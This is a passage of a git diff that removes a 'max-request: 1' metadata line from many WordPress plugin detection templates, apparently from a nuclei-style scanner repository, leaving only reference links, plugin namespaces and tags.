wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
- max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
- max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
- max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
- max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
- max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
- max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
- max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
- max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
- max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
- max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
- max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 23a88ea130..88d38e21ed 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
- max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
- max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 575c9ebe67..840c086fb9 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
- max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
- max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
- max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
- max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
- max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
- max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index 2409c6b370..a8eca7b056 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
- max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
- max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
- max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
- max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
- max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
- max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
- max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
- max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
- max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
- max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
- max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
- max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
- max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
- max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
- max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
- max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
- max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
- max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
- max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
- max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
- max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
- max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
- max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
- max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
- max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
- max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
- max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 8881e23860..8e1cb46cf0 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
- max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
- max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
